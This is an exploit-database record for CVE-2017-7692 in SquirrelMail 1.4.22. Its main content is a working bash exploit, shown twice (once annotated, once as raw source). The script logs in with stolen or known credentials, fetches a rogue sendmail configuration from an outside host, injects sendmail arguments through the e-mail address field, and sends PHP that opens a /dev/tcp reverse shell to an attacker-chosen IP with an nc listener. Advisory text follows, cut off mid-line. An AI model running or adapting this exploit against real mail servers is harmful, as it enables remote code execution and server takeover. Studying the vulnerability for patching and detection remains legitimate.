ID EDB-ID:41910
Type exploitdb
Reporter Exploit-DB
Modified 2017-04-23T00:00:00
Description
SquirrelMail <= 1.4.22 (and SVN snapshots before 20170427_0200) - Authenticated Remote Code Execution via sendmail argument injection. CVE-2017-7692. Remote exploit for Linux platform; requires valid user credentials and a SquirrelMail instance that delivers mail through the local sendmail binary.
#!/bin/bash
#
# ANSI-coloured start-up banner (\033[94m = bright blue, \033[0m = reset),
# printed later with `echo -e "$int"`.  Cosmetic only; the ASCII art appears
# to have lost its column alignment in this copy of the listing.
int='\033[94m
__ __ __ __ __
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
/____/
SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)
SquirrelMail_RCE_exploit.sh (ver. 1.0)
Discovered and coded by
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
ExploitBox project:
https://ExploitBox.io
\033[0m'
# Quick and messy PoC for SquirrelMail webmail application.
# It contains payloads for 2 vectors:
# * File Write (sendmail -X transaction log written to a chosen path)
# * RCE (sendmail -C alternate config whose local mailer runs php on the message)
# Preconditions on the target:
# * valid SquirrelMail user credentials (this is a post-authentication bug)
# * SquirrelMail delivers mail by invoking the local sendmail binary
#   (useSendmail = true), not via SMTP
# * users may change their e-mail address (edit_identity = true, the default)
#
#
# Full advisory URL:
# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
# Exploit URL:
# https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh
#
# Tested on: Ubuntu 16.04
# squirrelmail package version:
# 2:1.4.23~svn20120406-2ubuntu1.16.04.1
# (an SVN snapshot newer than 1.4.22 but older than the 20170427 fix, so still affected)
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
# Stay tuned for my new project - ExploitBox
#
# .;lc'
# .,cdkkOOOko;.
# .,lxxkkkkOOOO000Ol'
# .':oxxxxxkkkkOOOO0000KK0x:'
# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
# '';ldxxxxxdc,. ,oOXXXNNNXd;,.
# .ddc;,,:c;. ,c: .cxxc:;:ox:
# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
# .dxxxxxdl;. ., .. .;cdxxxxxx:
# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
# .':oxxxxxxxxx.ckkkkkkkkxl,.
# .,cdxxxxx.ckkkkkxc.
# .':odx.ckxl,.
# .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------
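# SquirrelMail attachment spool: uploaded attachments are stored here under a
# generated 32-character name.  The rogue sendmail.cf is uploaded as an
# attachment and later referenced by absolute path through sendmail's -C
# option, so this MUST match $attachment_dir in the target's config.php.
# The default matches the Ubuntu 16.04 package this PoC was tested against;
# other installs (e.g. the seebug write-up) use /var/local/squirrelmail/attach/.
# Override with the SQSPOOL environment variable when the target differs.
sqspool="${SQSPOOL:-/var/spool/squirrelmail/attach/}"

echo -e "$int"

# Base URL of the SquirrelMail instance is the only positional argument.
if [ $# -ne 1 ]; then
	echo -e "Usage: \n$0 SquirrelMail_URL"
	echo -e "Example: \n$0 http://target/squirrelmail/ \n"
	echo -e "Optional environment:\n  SQSPOOL  attachment directory on the target (default: $sqspool)\n"
	exit 2
fi
URL="$1"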
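# Log in -----------------------------------------------------------------------
# Credentials are read interactively (password without echo, -r so backslashes
# are kept).  They are posted with --data-urlencode so that '&', '%' or '+' in
# the password cannot corrupt the form body, and the password is handed to curl
# through a 0600 temp file (curl's name@file form) instead of the command line,
# where it would be visible to every local user via ps.
echo -e "\n[*] Enter SquirrelMail user credentials"
read -r -p "user: " squser
read -r -s -p "pass: " sqpass

echo -e "\n\n[*] Logging in to SquirrelMail at $URL"
logintmp="$(mktemp -d)" || { echo "mktemp failed"; exit 2; }
printf '%s' "$sqpass" > "$logintmp/pw"
# Response headers are captured to a private temp file (not a fixed /tmp name:
# they carry the session cookies).  curl's exit status is checked so that an
# unreachable target is not mistaken for a successful login -- a grep-only
# check passes on an empty response.
loginresp="$(curl -s -S -D "$logintmp/headers" \
	--data-urlencode "login_username=$squser" \
	--data-urlencode "secretkey@$logintmp/pw" \
	-d "js_autodetect_results=1" -d "just_logged_in=1" \
	"$URL/src/redirect.php")"
rc=$?
rm -f "$logintmp/pw"
if [ $rc -ne 0 ]; then
	echo "Could not reach $URL/src/redirect.php (curl exit $rc)"
	rm -rf "$logintmp"
	exit 2
fi
if grep -q incorrect <<<"$loginresp"; then
	echo "Invalid creds"
	rm -rf "$logintmp"
	exit 2
fi
# The session is identified by two cookies, SQMSESSID and key; take the last
# value of each that the server set.  CRs are stripped first so a cookie with
# no attributes does not keep the trailing \r of the header line.
sessid="$(tr -d '\r' < "$logintmp/headers" | sed -n 's/^[Ss]et-[Cc]ookie: *SQMSESSID=\([^;]*\).*/\1/p' | tail -n1)"
keyid="$(tr -d '\r' < "$logintmp/headers" | sed -n 's/^[Ss]et-[Cc]ookie: *key=\([^;]*\).*/\1/p' | tail -n1)"
rm -rf "$logintmp"
if [ -z "$sessid" ] || [ -z "$keyid" ]; then
	echo "Login did not return SQMSESSID/key cookies -- is $URL really a SquirrelMail instance?"
	exit 2
fi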
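# Prepare Sendmail cnf -----------------------------------------------------------
#
# The RCE vector rests on sendmail honouring an attacker-supplied configuration
# (-C) whose local-mailer stanza runs php on the delivered message instead of a
# real delivery agent:
#
#   Mlocal,	P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
#		T=DNS/RFC822/X-Unix,
#		A=php -- $u $h ${client_addr}
#
# The config is fetched from legalhackers.com at run time.  That is a live
# dependency on a third-party host (the file is not pinned or verified beyond
# TLS): review it before relying on it, and set SMCNF=/path/to/local/copy to
# skip the download.  The copy lives in a mktemp file, not a fixed /tmp name
# another local user could pre-create or replace.
smcnf="$(mktemp)" || { echo "mktemp failed"; exit 2; }
if [ -n "$SMCNF" ]; then
	cp -- "$SMCNF" "$smcnf" || { echo "Cannot read $SMCNF"; rm -f "$smcnf"; exit 2; }
else
	# wget -q hides errors: check its status and reject an empty file so a
	# failed download is not silently uploaded and later fed to sendmail.
	if ! wget -q -O "$smcnf" https://legalhackers.com/exploits/sendmail-exploit.cf || [ ! -s "$smcnf" ]; then
		echo "Failed to download sendmail-exploit.cf (set SMCNF=/path/to/local/copy)"
		rm -f "$smcnf"
		exit 2
	fi
fi

# Upload config ------------------------------------------------------------------
# The file goes up as an ordinary compose-page attachment.  SquirrelMail stores
# it in $sqspool under a generated 32-character name, which the attach response
# exposes in its serialised session data (att_local_name";s:32:"<name>") -- that
# name is what the -C payload needs.  Both requests need the compose page's
# smtoken (CSRF token).
echo -e "\n\n[*] Uploading Sendmail config"
token="$(curl -s -b "SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1)"
# -H "Expect:" suppresses curl's default Expect: 100-continue on the multipart
# post.  send_to is unused by the "Add" action (the original passed an unset
# $mail here); the filename is pinned so the upload is still called smcnf-exp.
attachid="$(curl -H "Expect:" -s -b "SQMSESSID=$sessid; key=$keyid" -F "smtoken=$token" -F "send_to=" -F "subject=attach" -F "body=test" -F "attachfile=@$smcnf;filename=smcnf-exp" -F "username=$squser" -F "attach=Add" "$URL/src/compose.php" | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n')"
rm -f "$smcnf"
if [ ${#attachid} -lt 32 ]; then
	echo "Something went wrong. Failed to upload the sendmail file."
	exit 2
fi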
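# Create Sendmail cmd string according to selected payload -----------------------
#
# The chosen string is stored as the user's e-mail address and ends up as the
# -f<envelopefrom> argument of the sendmail command line that
# Deliver_SendMail.class.php builds.  That line only passes through
# escapeshellcmd(), which does not escape whitespace, so everything after a
# whitespace character becomes a separate sendmail argument.  The seebug PoC
# notes that spaces are stripped from the address unless it is wrapped in <>;
# this script sidesteps that by separating the arguments with TAB.  The tabs
# are written as $'\t' so they survive copy/paste and tab-expanding editors
# (this listing had already turned them into spaces, which breaks the exploit).
#   -oQ/tmp/   points sendmail's queue directory at /tmp (presumably so it
#              need not write to the real, root-owned queue)
#   -X<file>   transaction log -> arbitrary file write on the target (payload 1)
#   -C<file>   alternate sendmail.cf -> the uploaded config (payload 2)
echo -e "\n\n[?] Select payload\n"
# SELECT PAYLOAD
echo "1 - File write (into /tmp/sqpoc)"
echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"
echo
read -r -p "[1-2] " pchoice

tab=$'\t'
case "$pchoice" in
	1) payload="$squser@localhost${tab}-oQ/tmp/${tab}-X/tmp/sqpoc"
	   ;;
	2) payload="$squser@localhost${tab}-oQ/tmp/${tab}-C$sqspool/$attachid"
	   ;;
	*) # Anything else used to leave $payload empty and then crash the
	   # numeric test below on non-numeric input.
	   echo "Invalid choice: '$pchoice' (expected 1 or 2)"
	   exit 2
	   ;;
esac

reverse_ip=""
reverse_port=""
if [ "$pchoice" -eq 2 ]; then
	echo
	read -r -p "Reverse shell IP: " reverse_ip
	read -r -p "Reverse shell PORT: " reverse_port
	# Both values are interpolated into the PHP below, and the port is also
	# given to the local nc listener; reject obviously malformed input early.
	if [ -z "$reverse_ip" ] || ! [[ "$reverse_port" =~ ^[0-9]{1,5}$ ]]; then
		echo "Reverse shell IP must be set and PORT must be numeric"
		exit 2
	fi
fi

# Reverse shell code ---------------------------------------------------------------
# Message body for payload 2: once the rogue config makes sendmail run php on
# the message, this writes a one-line bash script to /tmp/cmd on the target
# (a fixed, predictable name -- PoC artefact), runs it in the background and
# removes it.  The shell uses bash's /dev/tcp and runs with whatever privileges
# the sendmail process started by the web server keeps; confirm on the target
# rather than assuming.  Only referenced for payload 2; for payload 1 the
# placeholders are empty and the body is never executed.
phprevsh="
<?php
	\$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\";
	file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);
	system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");
?>"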
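# Set sendmail params in user settings ---------------------------------------------
# Store the crafted string through the Personal Information options page
# (new_email_address).  This is the injection point: SquirrelMail later hands
# the address to sendmail as the envelope sender.  It needs edit_identity to be
# enabled on the target (the default).  --data-urlencode keeps the embedded
# tabs intact.
echo -e "\n[*] Injecting Sendmail command parameters"
token="$(curl -s -b "SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1)"
if [ -z "$token" ]; then
	# Without the CSRF token the submit below is rejected; say so instead of
	# reporting a generic injection failure.
	echo "Could not read the smtoken CSRF token from the options page (session expired?)"
	exit 2
fi
# 'Success' is the English confirmation text; a localised SquirrelMail may word
# it differently and trip this check even though the value was stored.
if ! curl -s -b "SQMSESSID=$sessid; key=$keyid" \
	-d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" \
	--data-urlencode "new_email_address=$payload" \
	"$URL/src/options.php?optpage=personal" | grep -q 'Success'; then
	echo "Failed to inject sendmail parameters"
	exit 2
fi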
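# Send email which triggers the RCE vuln and runs phprevsh ------------------------
# Sending any message makes SquirrelMail popen() sendmail with the poisoned -f
# argument.  The send is started in the background (after a short delay) so the
# nc listener below is already up when the connection comes back.  Response
# headers go to a private mktemp file rather than a fixed /tmp path.
echo -e "\n[*] Sending the email to trigger the vuln"
sheaders="$(mktemp)" || { echo "mktemp failed"; exit 2; }
(sleep 2s && curl -s -D "$sheaders" -b "SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token" -d "startMessage=1" -d "session=0" \
	-d "send_to=$squser@localhost" -d "subject=poc" --data-urlencode "body=$phprevsh" -d "send=Send" -d "username=$squser" "$URL/src/compose.php") &
sendpid=$!

if [ "$pchoice" -eq 2 ]; then
	echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"
	# Traditional/GNU netcat syntax; OpenBSD nc expects "nc -lv $reverse_port".
	nc -vv -l -p "$reverse_port"
else
	echo -e "\n[*] The test file should have been written at /tmp/sqpoc"
fi

# Reap the background send before inspecting its headers.  Without this the
# file-write path read the headers file immediately -- before the delayed curl
# had written it -- and always reported a failure.
wait "$sendpid"
if ! grep -q "302 Found" "$sheaders"; then
	echo "There was a problem with sending email"
	rm -f "$sheaders"
	exit 2
fi
rm -f "$sheaders"

# Done
echo -e "\n[*] All done. Exiting"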
{"id": "EDB-ID:41910", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SquirrelMail < 1.4.22 - Remote Code Execution", "description": "SquirrelMail < 1.4.22 - Remote Code Execution. CVE-2017-7692. Remote exploit for Linux platform", "published": "2017-04-23T00:00:00", "modified": "2017-04-23T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.0}, "href": "https://www.exploit-db.com/exploits/41910/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-7692"], "lastseen": "2017-04-25T08:47:10", "viewCount": 146, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2017-04-25T08:47:10", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-7692"]}, {"type": "seebug", "idList": ["SSV:93005"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310890941", "OPENVAS:1361412562310872735", "OPENVAS:1361412562310703852", "OPENVAS:1361412562310872733", "OPENVAS:1361412562310106785", "OPENVAS:703852"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142212", "PACKETSTORM:142266"]}, {"type": "debian", "idList": ["DEBIAN:DLA-941-1:C74C1", "DEBIAN:DSA-3852-1:F4146"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:5A207B9957580AC118ED163D0FEC5A56"]}, {"type": "nessus", "idList": ["FEDORA_2017-0B6DA97AA5.NASL", "FREEBSD_PKG_E1DE77E8C45E48D788665A6F943046DE.NASL", "DEBIAN_DSA-3852.NASL", "DEBIAN_DLA-941.NASL", "FEDORA_2017-A7161EB173.NASL", "FEDORA_2017-F85C37AE3D.NASL", "GENTOO_GLSA-201709-13.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27626"]}, {"type": "fedora", "idList": ["FEDORA:20BC26069BE6", "FEDORA:4913A60478E1", "FEDORA:70FB5602F586"]}, {"type": "gentoo", "idList": ["GLSA-201709-13"]}, {"type": "threatpost", "idList": ["THREATPOST:0F388C5119C618F2D1F264ECDB1BD186"]}], "modified": "2017-04-25T08:47:10", "rev": 2}, "vulnersScore": 6.3}, "sourceHref": "https://www.exploit-db.com/download/41910/", "sourceData": 
"#!/bin/bash\r\n#\r\nint='\\033[94m\r\n __ __ __ __ __ \r\n / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________\r\n / / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/\r\n / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \r\n /_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \r\n /____/ \r\n\r\nSquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)\r\n\r\nSquirrelMail_RCE_exploit.sh (ver. 1.0)\r\n\r\nDiscovered and coded by \r\n\r\nDawid Golunski (@dawid_golunski)\r\nhttps://legalhackers.com\r\n\r\nExploitBox project:\r\nhttps://ExploitBox.io\r\n\r\n\\033[0m'\r\n\r\n# Quick and messy PoC for SquirrelMail webmail application.\r\n# It contains payloads for 2 vectors:\r\n# * File Write\r\n# * RCE \r\n# It requires user credentials and that SquirrelMail uses \r\n# Sendmail method as email delivery transport\r\n#\r\n#\r\n# Full advisory URL:\r\n# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html\r\n# Exploit URL:\r\n# https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh\r\n#\r\n# Tested on: # Ubuntu 16.04 \r\n# squirrelmail package version:\r\n# 2:1.4.23~svn20120406-2ubuntu1.16.04.1 \r\n#\r\n# Disclaimer:\r\n# For testing purposes only\r\n#\r\n#\r\n# -----------------------------------------------------------------\r\n#\r\n# Interested in vulns/exploitation? \r\n# Stay tuned for my new project - ExploitBox\r\n# \r\n# .;lc' \r\n# .,cdkkOOOko;. \r\n# .,lxxkkkkOOOO000Ol' \r\n# .':oxxxxxkkkkOOOO0000KK0x:' \r\n# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. \r\n# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. \r\n# '';ldxxxxxdc,. ,oOXXXNNNXd;,. \r\n# .ddc;,,:c;. ,c: .cxxc:;:ox: \r\n# .dxxxxo, ., ,kMMM0:. ., .lxxxxx: \r\n# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: \r\n# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: \r\n# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: \r\n# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: \r\n# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: \r\n# .dxxxxxc lKo;dNMN.oMM0;:Ok. 
'xxxxxx: \r\n# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: \r\n# .dxxxxxdl;. ., .. .;cdxxxxxx: \r\n# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: \r\n# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. \r\n# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. \r\n# .':oxxxxxxxxx.ckkkkkkkkxl,. \r\n# .,cdxxxxx.ckkkkkxc. \r\n# .':odx.ckxl,. \r\n# .,.'. \r\n#\r\n# https://ExploitBox.io\r\n#\r\n# https://twitter.com/Exploit_Box\r\n#\r\n# -----------------------------------------------------------------\r\n\r\nsqspool=\"/var/spool/squirrelmail/attach/\"\r\n\r\necho -e \"$int\"\r\n#echo -e \"\\033[94m \\nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \\n\"\r\n#echo -e \"SquirrelMail_RCE_exploit.sh (ver. 1.0)\\n\"\r\n#echo -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttps://legalhackers.com \\033[0m\\n\\n\"\r\n\r\n\r\n# Base URL\r\nif [ $# -ne 1 ]; then\r\n\techo -e \"Usage: \\n$0 SquirrelMail_URL\"\r\n\techo -e \"Example: \\n$0 http://target/squirrelmail/ \\n\"\r\n\t\r\n\texit 2\r\nfi\r\nURL=\"$1\"\r\n\r\n# Log in\r\necho -e \"\\n[*] Enter SquirrelMail user credentials\"\r\nread -p \"user: \" squser\r\nread -sp \"pass: \" sqpass\r\n\r\necho -e \"\\n\\n[*] Logging in to SquirrelMail at $URL\"\r\ncurl -s -D /tmp/sqdata -d\"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1\" $URL/src/redirect.php | grep -q incorrect\r\nif [ $? 
-eq 0 ]; then\r\n\techo \"Invalid creds\"\r\n\texit 2\r\nfi\r\nsessid=\"`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`\"\r\nkeyid=\"`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`\"\r\n\r\n\r\n# Prepare Sendmail cnf\r\n#\r\n# * The config will launch php via the following stanza:\r\n# \r\n# Mlocal,\tP=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,\r\n# \t\tT=DNS/RFC822/X-Unix,\r\n# \t\tA=php -- $u $h ${client_addr}\r\n#\r\nwget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf\r\n\r\n# Upload config\r\necho -e \"\\n\\n[*] Uploading Sendmail config\"\r\ntoken=\"`curl -s -b\"SQMSESSID=$sessid; key=$keyid\" \"$URL/src/compose.php?mailbox=INBOX&startMessage=1\" | grep smtoken | awk -F'value=\"' '{print $2}' | cut -d'\"' -f1 `\"\r\nattachid=\"`curl -H \"Expect:\" -s -b\"SQMSESSID=$sessid; key=$keyid\" -F\"smtoken=$token\" -F\"send_to=$mail\" -F\"subject=attach\" -F\"body=test\" -F\"attachfile=@/tmp/smcnf-exp\" -F\"username=$squser\" -F\"attach=Add\" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'\"' '{print $2}' | tr -d '\\n'`\"\r\nif [ ${#attachid} -lt 32 ]; then\r\n\techo \"Something went wrong. Failed to upload the sendmail file.\"\r\n\texit 2\r\nfi\r\n\r\n# Create Sendmail cmd string according to selected payload\r\necho -e \"\\n\\n[?] 
Select payload\\n\"\r\n# SELECT PAYLOAD\r\necho \"1 - File write (into /tmp/sqpoc)\"\r\necho \"2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)\"\r\necho\r\nread -p \"[1-2] \" pchoice\r\n\r\ncase $pchoice in\r\n\t1) payload=\"$squser@localhost\t-oQ/tmp/\t-X/tmp/sqpoc\" \r\n\t ;;\r\n\r\n\t2) payload=\"$squser@localhost\t-oQ/tmp/\t-C$sqspool/$attachid\" \r\n\t ;;\r\nesac\r\n\r\nif [ $pchoice -eq 2 ]; then\r\n\techo\r\n\tread -p \"Reverese shell IP: \" reverse_ip\r\n\tread -p \"Reverese shell PORT: \" reverse_port\r\nfi\r\n\r\n# Reverse shell code\r\nphprevsh=\"\r\n<?php \r\n\t\\$cmd = \\\"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\\\";\r\n\tfile_put_contents(\\\"/tmp/cmd\\\", 'export PATH=\\\"\\$PATH\\\" ; export TERM=vt100 ;' . \\$cmd);\r\n\tsystem(\\\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\\\");\r\n?>\"\r\n\r\n\r\n# Set sendmail params in user settings\r\necho -e \"\\n[*] Injecting Sendmail command parameters\"\r\ntoken=\"`curl -s -b\"SQMSESSID=$sessid; key=$keyid\" \"$URL/src/options.php?optpage=personal\" | grep smtoken | awk -F'value=\"' '{print $2}' | cut -d'\"' -f1 `\"\r\ncurl -s -b\"SQMSESSID=$sessid; key=$keyid\" -d \"smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit\" --data-urlencode \"new_email_address=$payload\" \"$URL/src/options.php?optpage=personal\" | grep -q 'Success' 2>/dev/null\r\nif [ $? 
-ne 0 ]; then\r\n\techo \"Failed to inject sendmail parameters\"\r\n\texit 2\r\nfi\r\n\r\n# Send email which triggers the RCE vuln and runs phprevsh\r\necho -e \"\\n[*] Sending the email to trigger the vuln\"\r\n(sleep 2s && curl -s -D/tmp/sheaders -b\"SQMSESSID=$sessid; key=$keyid\" -d\"smtoken=$token\" -d\"startMessage=1\" -d\"session=0\" \\\r\n-d\"send_to=$squser@localhost\" -d\"subject=poc\" --data-urlencode \"body=$phprevsh\" -d\"send=Send\" -d\"username=$squser\" $URL/src/compose.php) &\r\n\r\nif [ $pchoice -eq 2 ]; then\r\n\techo -e \"\\n[*] Waiting for shell on $reverse_ip port $reverse_port\"\r\n\tnc -vv -l -p $reverse_port\r\nelse\r\n\techo -e \"\\n[*] The test file should have been written at /tmp/sqpoc\"\r\nfi\r\n\r\ngrep -q \"302 Found\" /tmp/sheaders\r\nif [ $? -eq 1 ]; then\r\n\techo \"There was a problem with sending email\"\r\n\texit 2\r\nfi\r\n\r\n\r\n# Done\r\necho -e \"\\n[*] All done. Exiting\"\r\n\r\n", "osvdbidlist": []}
{"cve": [{"lastseen": "2020-10-03T13:07:49", "description": "SquirrelMail 1.4.22 (and other versions before 20170427_0200-SVN) allows post-authentication remote code execution via a sendmail.cf file that is mishandled in a popen call. It's possible to exploit this vulnerability to execute arbitrary shell commands on the remote server. The problem is in the Deliver_SendMail.class.php with the initStream function that uses escapeshellcmd() to sanitize the sendmail command before executing it. The use of escapeshellcmd() is not correct in this case since it doesn't escape whitespaces, allowing the injection of arbitrary command parameters. The problem is in -f$envelopefrom within the sendmail command line. Hence, if the target server uses sendmail and SquirrelMail is configured to use it as a command-line program, it's possible to trick sendmail into using an attacker-provided configuration file that triggers the execution of an arbitrary command. For exploitation, the attacker must upload a sendmail.cf file as an email attachment, and inject the sendmail.cf filename with the -C option within the \"Options > Personal Informations > Email Address\" setting.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-20T14:59:00", "title": "CVE-2017-7692", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7692"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:squirrelmail:squirrelmail:1.4.22"], "id": "CVE-2017-7692", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7692", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:squirrelmail:squirrelmail:1.4.22:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T11:59:38", "description": "Squirrelmail version 1.4.22 (and probably prior) is vulnerable to a remote code execution vulnerability because\r\nit fails to sanitize a string before passing it to a popen call. It's possible to exploit this vulnerability to \r\nexecute arbitrary shell commands on the remote server.\r\n\r\nThe problem is in Deliver_SendMail.class.php on initStream function that uses escapeshellcmd() to sanitize the \r\nsendmail command before executing it. The use of escapeshellcmd() is not correct in this case since it don't \r\nescapes whitespaces allowing the injection of arbitrary command parameters.\r\n\r\n $this->sendmail_command = \"$sendmail_path $this->sendmail_args -f$envelopefrom\"; \r\n $stream = popen(escapeshellcmd($this->sendmail_command), \"w\");\r\n\r\n\r\nThe $envelopefrom variable is controlled by the attacker, hence it's possible to trick sendmail to use an \r\nattacker-provided configuration file that triggers the execution of an arbitrary command.\r\n\r\nIn order to exploit this vulnerability the MTA in use must be sendmail and Squirrelmail must be configured\r\nto use it as commandline (useSendmail directive of the config file set to true).\r\nAlso, the edit_identity directive of the config file must be bet to true, but this is the default configuration.\r\n\r\nTo reproduce the issue follow these steps:\r\n\r\n```\r\n 1. 
Create a rogue sendmail.cf that triggers the execution of a /usr/bin/touch:\r\n [...]\r\n Mlocal, P=/usr/bin/touch, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,\r\n T=DNS/RFC822/X-Unix,\r\n A=X /tmp/executed\r\n 2. Upload it as a mail attachment and get it's remote name (ex: lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD)\r\n 3. Go to Options -> Personal Informations and set the following payload as Email Address:\r\n <aaa () abc com -OQueueDirectory=/tmp -C \r\n/var/local/squirrelmail/attach/lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD>\r\n 4. Send an email\r\n 5. Verify the execution of the command with \"ls /tmp/executed\" on the remote server\r\n\r\n```", "published": "2017-04-22T00:00:00", "type": "seebug", "title": "Squirrelmail 1.4.22 Remote Code Execution (CVE-2017-7692)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7692"], "modified": "2017-04-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93005", "id": "SSV:93005", "sourceData": "\n The followig python script exploits this vulnerability to execute an attacker provided bash script on the remote server.\r\n\r\nBOF\r\n#!/usr/bin/env python\r\n# -*- coding: utf-8 -*- \r\n\r\n\"\"\"\r\n\r\nSquirrelMail 1.4.22 Remote Code Execution (authenticated) \r\nExploit code for CVE-2017-7692\r\nfilippo.cavallarin () wearesegment 